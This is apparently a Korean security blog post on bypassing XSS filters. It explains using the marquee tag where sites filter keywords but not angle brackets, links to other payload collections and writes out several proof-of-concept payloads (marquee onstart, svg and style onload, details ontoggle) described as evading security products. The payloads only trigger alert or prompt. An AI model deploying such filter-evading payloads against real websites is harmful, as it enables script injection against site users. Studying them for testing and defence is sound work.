marquee 태그를 이용하여 xss를 할 수 있습니다.
익스플로러에서만 사용가능한 글자나 이미지를 흘러가게 해주는 태그입니다.
marquee태그는 생소하므로, < , > , " 등을 필터링 하지 않고, 문자열로 필터링하는 사이트에서 사용해봄직 하겠네요
실제로 보안솔루션에서도 필터링하지 않아 우회가 가능한 것 같습니다(?)
https://hackbyr0k.tistory.com/217
보안솔루션 우회 XSS Payload
솔루션 우회가 되는 XSS Payload 입니다. 허가 받지 않은 실서버(웹사이트)에 공격하는 것은 명백한 불법행위이며, 형사 처벌을 받을 수도 있다는 것을 알려드립니다.(블로거는 책임 없음) 자신이 공격한 로그는..
hackbyr0k.tistory.com
marquee태그 설명 및 공격 방법
XSS
XSS Cross Site Script의 약자이다. 웹 표준이 Javascript이기 때문에 JS를 이용하여 공격한다. 기본적으로 자바스크립트의 문법은 <..
pjongy.tistory.com
marquee xss ex)
<marquee onstart=alert('xss') direction=right></marquee>
추가적으로 검색하다가 XSS관련하여 좋은 사이트가 있어서 공유합니다.
XSS Tricks, 웹 해킹 기법 정리
♣ Event Handler Filtering
seunit.tistory.com
<svg </onload="1>alert(1)""> 와 같이 /앞에 문자열이 들어가는 경우 정상적인 이벤트 핸들러로 인지한다고 합니다.
<style/onload=alert(1)>처럼 쓸 수 있다고 하네요
또한, details 태그를 이용해서 <deTAILS/open/onToGgle=a=prompt,a(1) x>와 같이 사용이 가능하다고 하네요~
추가적으로 알게되는 유용한 XSS 스크립트 계속 업데이트 예정..
'Web' 카테고리의 다른 글
| OAuth 2.0 (1) | 2021.03.31 |
|---|---|
| Same site (Cookie) (0) | 2021.03.29 |
| 주요 Editor 샘플페이지 및 취약점 발생경로 (4) | 2018.12.03 |
| xp_cmdshell 활성화 쿼리 (1) | 2018.10.01 |
| MSSQL Limit 기능 구현 (0) | 2018.10.01 |